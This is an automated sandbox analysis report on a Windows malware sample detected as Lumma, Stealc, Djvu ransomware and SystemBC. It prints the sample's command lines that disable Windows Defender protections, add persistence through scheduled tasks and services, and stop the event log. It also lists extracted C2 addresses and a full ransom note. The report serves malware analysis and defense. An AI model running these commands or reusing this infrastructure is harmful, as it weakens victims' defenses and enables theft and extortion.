Edit tour
Windows
Analysis Report
3QKcKCEzYP.exe
Overview
General Information
| Sample name: | 3QKcKCEzYP.exerenamed because original name is a hash value |
| Original sample name: | 7db3e0a15ff5d498fd56aab3ceb8b968.exe |
| Analysis ID: | 1496361 |
| MD5: | 7db3e0a15ff5d498fd56aab3ceb8b968 |
| SHA1: | d16db762e8ca0fc4f82b12119fad118c5f386217 |
| SHA256: | 1e1bc32c5d4d0cae5310d34827be61eb087dc6aca7a7d767c77529b41e720a81 |
| Tags: | exeStop |
| Infos: |   |
 | |
Detection
LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Djvu Ransomware
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected Neoreklami
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected SystemBC
Yara detected Xmrig cryptocurrency miner
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Queries Google from non browser process on port 80
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
3QKcKCEzYP.exe (PID: 4032 cmdline: "C:\Users\ user\Deskt op\3QKcKCE zYP.exe" MD5: 7DB3E0A15FF5D498FD56AAB3CEB8B968) 
fOzLadrzZNRnwv2woTdiFoXM.exe (PID: 4304 cmdline: C:\Users\u ser\Docume nts\pirate mamm\fOzLa drzZNRnwv2 woTdiFoXM. exe MD5: 993F5FDF3BD55F35661293167E39649A) 
MSBuild.exe (PID: 4896 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) 
MrBEu6cm6HagE9yrmXV8x4AG.exe (PID: 6096 cmdline: C:\Users\u ser\Docume nts\pirate mamm\MrBEu 6cm6HagE9y rmXV8x4AG. exe MD5: 006EDF0AC466164DDC9E0AC56474FE0A) 
r0bVQRH8Dto7infNi6DOB01w.exe (PID: 1548 cmdline: C:\Users\u ser\Docume nts\pirate mamm\r0bVQ RH8Dto7inf Ni6DOB01w. exe MD5: 6685BAAC90C11334FF11841BFA22E61B) - Install.exe (PID: 5668 cmdline:
.\Install. exe MD5: 26775D5C2D6D7D007426B7F6B97139D9) 
Install.exe (PID: 3164 cmdline: .\Install. exe /uSdid ZODwd "525 403" /S MD5: 1FB6BC61C7538FE32C88454B5082B7DC) 
cmd.exe (PID: 3992 cmdline: "C:\Window s\System32 \cmd.exe" /C forfile s /p c:\wi ndows\syst em32 /m wh ere.exe /c "cmd /C r eg add \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v 214 7735503 /t REG_SZ /d 6" & forf iles /p c: \windows\s ystem32 /m calc.exe /c "cmd /C reg add \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v 2 147814524 /t REG_SZ /d 6" & fo rfiles /p c:\windows \system32 /m where.e xe /c "cmd /C reg ad d \"HKLM\S OFTWARE\Po licies\Mic rosoft\Win dows Defen der\Threat s\ThreatID DefaultAct ion\" /f / v 21477801 99 /t REG_ SZ /d 6" & forfiles /p c:\wind ows\system 32 /m wait for.exe /c "cmd /C r eg add \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v 214 7812831 /t REG_SZ /d 6" & forf iles /p c: \windows\s ystem32 /m help.exe /c "cmd /C powershel l start-pr ocess -Win dowStyle H idden gpup date.exe / force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5564 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - forfiles.exe (PID: 5224 cmdline:
forfiles / p c:\windo ws\system3 2 /m where .exe /c "c md /C reg add \"HKLM \SOFTWARE\ Policies\M icrosoft\W indows Def ender\Thre ats\Threat IDDefaultA ction\" /f /v 214773 5503 /t RE G_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 420 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 6324 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 5832 cmdline:
forfiles / p c:\windo ws\system3 2 /m calc. exe /c "cm d /C reg a dd \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v 2147814 524 /t REG _SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 5552 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147814524 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 2876 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 814524 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 3924 cmdline:
forfiles / p c:\windo ws\system3 2 /m where .exe /c "c md /C reg add \"HKLM \SOFTWARE\ Policies\M icrosoft\W indows Def ender\Thre ats\Threat IDDefaultA ction\" /f /v 214778 0199 /t RE G_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 1824 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147780199 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 3472 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 780199 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 6128 cmdline:
forfiles / p c:\windo ws\system3 2 /m waitf or.exe /c "cmd /C re g add \"HK LM\SOFTWAR E\Policies \Microsoft \Windows D efender\Th reats\Thre atIDDefaul tAction\" /f /v 2147 812831 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 4832 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Threats\ ThreatIDDe faultActio n" /f /v 2 147812831 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 4392 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction" /f /v 2147 812831 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - forfiles.exe (PID: 776 cmdline:
forfiles / p c:\windo ws\system3 2 /m help. exe /c "cm d /C power shell star t-process -WindowSty le Hidden gpupdate.e xe /force" MD5: D95C443851F70F77427B3183B1619DD3) - cmd.exe (PID: 2276 cmdline:
/C powersh ell start- process -W indowStyle Hidden gp update.exe /force MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - forfiles.exe (PID: 6516 cmdline:
"C:\Window s\System32 \forfiles. exe" /p c: \windows\s ystem32 /m waitfor.e xe /c "cmd /C powers hell -Wind owStyle Hi dden WMIC /NAMESPACE :\\root\Mi crosoft\Wi ndows\Defe nder PATH MSFT_MpPre ference ca ll Add Exc lusionExte nsion=exe Force=True " MD5: D95C443851F70F77427B3183B1619DD3) - conhost.exe (PID: 5332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7000 cmdline:
/C powersh ell -Windo wStyle Hid den WMIC / NAMESPACE: \\root\Mic rosoft\Win dows\Defen der PATH M SFT_MpPref erence cal l Add Excl usionExten sion=exe F orce=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) 
powershell.exe (PID: 5232 cmdline: powershell -WindowSt yle Hidden WMIC /NAM ESPACE:\\r oot\Micros oft\Window s\Defender PATH MSFT _MpPrefere nce call A dd Exclusi onExtensio n=exe Forc e=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
WMIC.exe (PID: 7140 cmdline: "C:\Window s\System32 \Wbem\WMIC .exe" /NAM ESPACE:\\r oot\Micros oft\Window s\Defender PATH MSFT _MpPrefere nce call A dd Exclusi onExtensio n=exe Forc e=True MD5: E2DE6500DE1148C7F6027AD50AC8B891) - schtasks.exe (PID: 1280 cmdline:
schtasks / CREATE /TN "bhigQxvK bgfszOKTET " /SC once /ST 02:33 :00 /RU "S YSTEM" /TR "\"C:\Use rs\user\Ap pData\Loca l\Temp\7zS 27CB.tmp\I nstall.exe \" kd /CVd idr 525403 /S" /V1 / F MD5: 48C2FE20575769DE916F48EF0676A965) 
zVS6xq86P4Kl0c26CfULXfv4.exe (PID: 2968 cmdline: C:\Users\u ser\Docume nts\pirate mamm\zVS6x q86P4Kl0c2 6CfULXfv4. exe MD5: 8447DBE44AA2EDE5D56341E0DC22F319) - powercfg.exe (PID: 6368 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 1936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 2420 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 1460 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 2276 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 3492 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1280 cmdline:
powershell start-pr ocess -Win dowStyle H idden gpup date.exe / force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - gpupdate.exe (PID: 876 cmdline:
"C:\Window s\system32 \gpupdate. exe" /forc e MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8) - conhost.exe (PID: 5536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 3492 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 5024 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 3852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 3872 cmdline:
C:\Windows \system32\ sc.exe del ete "KSKIU XEH" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 2156 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Conhost.exe (PID: 6612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 4488 cmdline:
C:\Windows \system32\ sc.exe cre ate "KSKIU XEH" binpa th= "C:\Pr ogramData\ kttbjzxfyq cy\erzljnh mzkuz.exe" start= "a uto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 404 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 2988 cmdline:
C:\Windows \system32\ sc.exe sto p eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 5504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 4592 cmdline:
C:\Windows \system32\ sc.exe sta rt "KSKIUX EH" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 2432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - 6UF1Jcwj34zqEggktO7mg1WS.exe (PID: 364 cmdline:
C:\Users\u ser\Docume nts\pirate mamm\6UF1J cwj34zqEgg ktO7mg1WS. exe MD5: 902F14B6F32CC40A82D6A0F2C41208EC) - yZBxqqQICO50PLfWYKwJeSL5.exe (PID: 6792 cmdline:
C:\Users\u ser\Docume nts\pirate mamm\yZBxq qQICO50PLf WYKwJeSL5. exe MD5: D4FCA59C99D8D70ACA5744D147E37C03)
- erzljnhmzkuz.exe (PID: 6780 cmdline:
C:\Program Data\kttbj zxfyqcy\er zljnhmzkuz .exe MD5: 8447DBE44AA2EDE5D56341E0DC22F319) - powercfg.exe (PID: 2704 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 3504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 5564 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 6648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 500 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 6828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| STOP, Djvu | STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| SystemBC | SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018. | No Attribution |
{"C2 url": "http://193.176.190.41/2fa883eebd632382.php"}{"C2 url": ["consciousourwi.shop", "interactiedovspm.shop", "torubleeodsmzo.shop", "cagedwifedsozm.shop", "weiggheticulop.shop", "charecteristicdxp.shop", "potentioallykeos.shop", "deicedosmzj.shop", "southedhiscuso.shop"], "Build id": "a8kafm--@cloudcosmic"}{"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsZOJbLC8rdQ3RNFdWJ9l\\\\nsRHwDxjXZCN4K9IEo3ccj2X7KVzvLXJ\\/I+jMWoFDgbTA5TMMDPMhlSykGYr1rbX9\\\\ntDxs5EL7FC3R6jbLzQ+QVdvG2Slvd1aEiSAhkrB6Z97DC28ixTGkA4aCQKKFT5ge\\\\nSXPpDStS2N3zeiWPCMkOs9RErtxVW9sXoWRAFtBg2kSHTyKEWcRqnxplrJGdVQKU\\\\n0DxDnHDefnxaf\\/3VSRczBwGZlq\\/Mr2bfHM2Mf8JWmYztlmGbjGb\\/\\/oixuuRePxzt\\\\n6xgozgVrC64HnagNFyODdlk2w\\/BpJWXIbgivZ0kR40Ll3NEAl3Z26cIkIc6pAJ3s\\\\nfwIDAQAB\\\\n-----END PUBLIC KEY-----"}{"HOST1": "claywyaeropumps.com", "HOST2": "178.132.2.10", "DNS1": "5.132.191.104", "DNS2": "ns1.vic.au.dns.opennic.glue", "DNS3": "ns2.vic.au.dns.opennic.glue"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security | ||
| JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security | ||
| Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth |
| |
| JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security | ||
| Click to see the 28 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | ||
| JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | ||
| JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security | ||
| Click to see the 16 entries | ||||
Change of critical system settings |   |
|---|
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Kiran kumar s, oscd.community: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||